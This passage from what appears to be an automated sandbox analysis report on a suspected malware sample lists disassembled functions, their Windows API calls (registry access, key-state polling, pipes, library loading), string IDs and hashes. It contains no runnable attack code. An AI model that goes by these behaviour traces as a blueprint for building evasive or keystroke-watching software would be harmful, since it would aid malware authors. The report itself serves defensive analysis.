                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: d4c6b29702ae848122172d1b2afa711a6e5f5f23766635646f7919ce2f152680
                                          • Instruction ID: ae721677559175a91486a6f68a6b32188765546fd2b6985706ffb333cf68e27d
                                          • Opcode Fuzzy Hash: d4c6b29702ae848122172d1b2afa711a6e5f5f23766635646f7919ce2f152680
                                          • Instruction Fuzzy Hash: 564191302043029FD724DF24C845B5ABBE8EF86325F144A5EFE65A72D1D770E908CBA2
                                          Function 00E6DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E6DAD9
                                            • Part of subcall function 00DF79AB: _memmove.LIBCMT ref: 00DF79F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharLower_memmove
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 3425801089-567219261
                                          • Opcode ID: 54f17f3fbb45bf5c44f7d2a1b1bc38274a266782ab56a80d6e21277624f12179
                                          • Instruction ID: 5a0d50aec4bde943ffad93ed138b8bab42426951c3194e0c0bdc6ef637ea71ed
                                          • Opcode Fuzzy Hash: 54f17f3fbb45bf5c44f7d2a1b1bc38274a266782ab56a80d6e21277624f12179
                                          • Instruction Fuzzy Hash: FA31F270A04609AFCF00EF54DC818FEB3B4FF05360B019A29E825BB6D5CB71A905CB90
                                          Function 00E49372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E493F6
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E49409
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E49439
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 365058703-1403004172
                                          • Opcode ID: 3930d5d7047d8ee4a089420ec23a1bee184fbd3d383a01e21eea0da5375220a2
                                          • Instruction ID: 58125a96976d1f774ccae6b3d18ebfd46a2dfd8782b8e0ed875d3bb2c86dd26f
                                          • Opcode Fuzzy Hash: 3930d5d7047d8ee4a089420ec23a1bee184fbd3d383a01e21eea0da5375220a2
                                          • Instruction Fuzzy Hash: EB21E471900108AEDB14ABB4EC868FFB7B8DF45360B119119FA25B71E2DB355E4A9630
                                          Function 00E76656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DF1D73
                                            • Part of subcall function 00DF1D35: GetStockObject.GDI32(00000011), ref: 00DF1D87
                                            • Part of subcall function 00DF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF1D91
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E766D0
                                          • LoadLibraryW.KERNEL32(?), ref: 00E766D7
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E766EC
                                          • DestroyWindow.USER32(?), ref: 00E766F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: 37e5e0da7e30efcd55d987084b5b7402bd043d8d4355e991951d4b94c6ec4019
                                          • Instruction ID: b47770cfbaaf0303d86737e264319d5d48480d6c68bc0bf1e6d405f4e6f80d1e
                                          • Opcode Fuzzy Hash: 37e5e0da7e30efcd55d987084b5b7402bd043d8d4355e991951d4b94c6ec4019
                                          • Instruction Fuzzy Hash: 35219271100605AFEF104FA4EC80EBB37ADEF5936CF50A629F919B6190D771DC919760
                                          Function 00E5703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00E5705E
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E57091
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00E570A3
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E570DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: b4307d36af2a02e937e08e2040f61822a1f85330eac428cdd506c641b348b17c
                                          • Instruction ID: ee22ff83a3f4c0584fe6f86dd91aee6f8ebb3f977a9f77f208583bce5e088df6
                                          • Opcode Fuzzy Hash: b4307d36af2a02e937e08e2040f61822a1f85330eac428cdd506c641b348b17c
                                          • Instruction Fuzzy Hash: 18217F74604209ABDB209F29EC05A9A77E8AF44725F205A29FDE1E72D0D77098688B60
                                          Function 00E5710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E5712B
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E5715D
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E5716E
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E571A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: f387a899238d0e3b56a48d61a2bd85685d4df404105b8f8cb855489d0432ec4f
                                          • Instruction ID: 11cc386f446a3e5f7688f4164b8b714abdf818718b113715e387519cdc004127
                                          • Opcode Fuzzy Hash: f387a899238d0e3b56a48d61a2bd85685d4df404105b8f8cb855489d0432ec4f
                                          • Instruction Fuzzy Hash: B521C1716097059BDB209F29AD04AAAB7E8AF45335F201E19FCE1F72D0D7709869CB60
                                          Function 00E5AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E5AEBF
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E5AF13
                                          • __swprintf.LIBCMT ref: 00E5AF2C
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E7F910), ref: 00E5AF6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: 22e448a0c583c93f322e60b04962d8b8d8b6b636ed228171573027e1566ce5ca
                                          • Instruction ID: e0e975a89fafdb007f66cc8c5ab8283fdd37fe91e09fcf81c8c07c5db6a707b0
                                          • Opcode Fuzzy Hash: 22e448a0c583c93f322e60b04962d8b8d8b6b636ed228171573027e1566ce5ca
                                          • Instruction Fuzzy Hash: 70217430A00209AFCB10DF65D985EAEBBF8EF49704B104079F909EB252DB71EA45DB21
                                          Function 00E4A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                            • Part of subcall function 00E4A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E4A399
                                            • Part of subcall function 00E4A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E4A3AC
                                            • Part of subcall function 00E4A37C: GetCurrentThreadId.KERNEL32 ref: 00E4A3B3
                                            • Part of subcall function 00E4A37C: AttachThreadInput.USER32(00000000), ref: 00E4A3BA
                                          • GetFocus.USER32 ref: 00E4A554
                                            • Part of subcall function 00E4A3C5: GetParent.USER32(?), ref: 00E4A3D3
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E4A59D
                                          • EnumChildWindows.USER32(?,00E4A615), ref: 00E4A5C5
                                          • __swprintf.LIBCMT ref: 00E4A5DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                          • String ID: %s%d
                                          • API String ID: 1941087503-1110647743
                                          • Opcode ID: 331122d3112e9ed8b3a6c352e6e6338e8cf6d0deccbbb37340c49a637ae0d8dd
                                          • Instruction ID: 188894cde5db3f789acdb6e6eeb2c7d521b84ce04a72a46fd3ec294634e7448e
                                          • Opcode Fuzzy Hash: 331122d3112e9ed8b3a6c352e6e6338e8cf6d0deccbbb37340c49a637ae0d8dd
                                          • Instruction Fuzzy Hash: 0C119071640208ABDF10BF64EC85FFA37A8AF48710F0890B5FE0CBA152DA7059858B75
                                          Function 00E52017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E52048
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 3964851224-769500911
                                          • Opcode ID: 673eb95f394a3ef7dd730c0c4f14039f63f308145f9b82f6de1581f89176a710
                                          • Instruction ID: 7e25ad5c15a4730aedc43492c6f1a878b3bbc9b6a94550e7fb7a22a8bc2b5cb1
                                          • Opcode Fuzzy Hash: 673eb95f394a3ef7dd730c0c4f14039f63f308145f9b82f6de1581f89176a710
                                          • Instruction Fuzzy Hash: 51116D70901219DFCF00EFA4D8414FEB7B4FF6A304B109868D955BB292EB32A94ACB50
                                          Function 00E6EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E6EF1B
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E6EF4B
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E6F07E
                                          • CloseHandle.KERNEL32(?), ref: 00E6F0FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: dc7a72908faa5e1933c0f39b7959e14bc9e60f4197de4a43f2b7a637f568c90d
                                          • Instruction ID: c9fb68e6e5f9d250ee7bb34f8f4a9217573f15aaae1e602fdb49cc64b6b46e88
                                          • Opcode Fuzzy Hash: dc7a72908faa5e1933c0f39b7959e14bc9e60f4197de4a43f2b7a637f568c90d
                                          • Instruction Fuzzy Hash: 67819371A443019FD720DF24D856F2AB7E5EF48710F05881DFA99EB392DB71AC408B61
                                          Function 00E702C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E70038,?,?), ref: 00E710BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E70388
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E703C7
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E7040E
                                          • RegCloseKey.ADVAPI32(?,?), ref: 00E7043A
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E70447
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: a0285144ec7ee9bbaa66b4e931829cff27408ee65338dba402a43d8bd722943a
                                          • Instruction ID: e96b688b0d6cfa4a250246add4b0ecef6813897c1bafad3a6fe6822e366f6803
                                          • Opcode Fuzzy Hash: a0285144ec7ee9bbaa66b4e931829cff27408ee65338dba402a43d8bd722943a
                                          • Instruction Fuzzy Hash: 21512C71208204EFD704EF64D881E6EB7E8FF84314F04991DF699A7291DB30E905DB62
                                          Function 00E5E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E5E88A
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E5E8B3
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E5E8F2
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E5E917
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E5E91F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: b2a743aa5673a8c31fabdfb724f6af50c124767820787a88b844045b01911bbc
                                          • Instruction ID: e95b410d6ed868c0df7c4061f002a63a733a8e8f1b977e306028cf1962f33fe1
                                          • Opcode Fuzzy Hash: b2a743aa5673a8c31fabdfb724f6af50c124767820787a88b844045b01911bbc
                                          • Instruction Fuzzy Hash: 3C512A35A00209DFCF05EF64C991AAEBBF5EF08314B158499E909AB362CB31ED55DF60
                                          Function 00E7A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0f5629842df1f1b4e03f9407559dc42da91d04f2c23fc9fcd66f0592989000a
                                          • Instruction ID: ff3362116bfb12b02342a116d1267ed9adcbdb3c8215a4a1baf82229e4d548c7
                                          • Opcode Fuzzy Hash: b0f5629842df1f1b4e03f9407559dc42da91d04f2c23fc9fcd66f0592989000a
                                          • Instruction Fuzzy Hash: FB41CF35900204BFD724DF28CC88BADBBA5EB89310F189275E96DB72E1D770AD419A51
                                          Function 00DF2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00DF2357
                                          • ScreenToClient.USER32(00EB67B0,?), ref: 00DF2374
                                          • GetAsyncKeyState.USER32(00000001), ref: 00DF2399
                                          • GetAsyncKeyState.USER32(00000002), ref: 00DF23A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 61467f23d2de810d7893af9d00f7dc9f1a3b527596378ad1562dc9ee51cf2458
                                          • Instruction ID: a138010acb2991596af69de9fb37702c1aef3d9beccaad8bcc588145802dde68
                                          • Opcode Fuzzy Hash: 61467f23d2de810d7893af9d00f7dc9f1a3b527596378ad1562dc9ee51cf2458
                                          • Instruction Fuzzy Hash: 5E419071504529FBCF159FA4DC44AFDBBB4FB05364F208319F928A62A0CB309994DBA1
                                          Function 00E46920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4695D
                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00E469A9
                                          • TranslateMessage.USER32(?), ref: 00E469D2
                                          • DispatchMessageW.USER32(?), ref: 00E469DC
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E469EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                          • String ID:
                                          • API String ID: 2108273632-0
                                          • Opcode ID: e8f29860b06a4e873dac7585363b953b45c637c911170219bb4d2b765a239ab5
                                          • Instruction ID: e67652b97691888d45783b4060a92794e4e4837a438627cf9828edff44ee2bac
                                          • Opcode Fuzzy Hash: e8f29860b06a4e873dac7585363b953b45c637c911170219bb4d2b765a239ab5
                                          • Instruction Fuzzy Hash: B031E571900646AFDB24CFB6EC44BF77BACBB42308F105265E525F21A0D7749889D7A2
                                          Function 00E48F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00E48F12
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00E48FBC
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E48FC4
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00E48FD2
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E48FDA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
